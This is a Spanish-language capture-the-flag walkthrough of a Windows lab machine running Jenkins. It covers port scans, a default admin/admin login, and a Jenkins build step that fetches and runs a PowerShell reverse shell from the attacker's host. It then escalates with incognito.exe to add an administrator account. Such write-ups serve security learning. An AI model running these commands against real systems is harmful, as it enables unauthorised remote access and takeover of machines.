nmap -A -p- -oA output 10.10.32.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210430065343.png

nmap -sC -sV -O -p- -oA optimum 10.10.32.27

nmap -sU -O -p- -oA optimum-udp 10.10.32.27

nikto -h 10.10.32.27:80

gobuster dir -k -u http://10.10.32.27/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210430065221.png

Vemos el puerto 8080 y nos logeamos con admin/admin en jenkins

Pasted image 20210430065314.png

Nos metemos a 10.10.32.27/job/project/configure y vemos que tienen un lugar para ejecutar comandos de batch en windows

Pasted image 20210430065535.png

hacemos un locate Invoke-PowerShellTcp.ps1 cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 . Invoke-PowerShellTcp -Reverse -IPAddress 10.6.72.57 -Port 3333

Pasted image 20210430071711.png

python3 -m http.server 8888

En el textbox de jenkins ponemos lo siguiente para ejecutar el script de powershell

powershell iex (New-Object Net.WebClient).DownloadString(''http://10.6.72.57:8888/Invoke-PowerShellTcp.ps1')

Guardamos

rlwrap nc -lvnp 3333

Pasted image 20210430073327.png

Le damos click a Build Now

systeminfo

Pasted image 20210430073411.png

whoami /priv

Pasted image 20210430073623.png

sudo python2 /usr/share/doc/python-impacket/examples/smbserver.py temp ~/Desktop/boxes/incognito2

Pasted image 20210430074419.png

En la maquina de windows

cd windows\temp copy \10.6.72.57\temp\incognito.exe dir

Pasted image 20210430074748.png

./incognito.exe add_user cu3rv0x asi_es ./incognito.exe add_localgroup_user Administrators cu3rv0x

Pasted image 20210430075116.png

Pasted image 20210430084610.png

boxes

copyright©2022 Cu3rv0x all rights reserved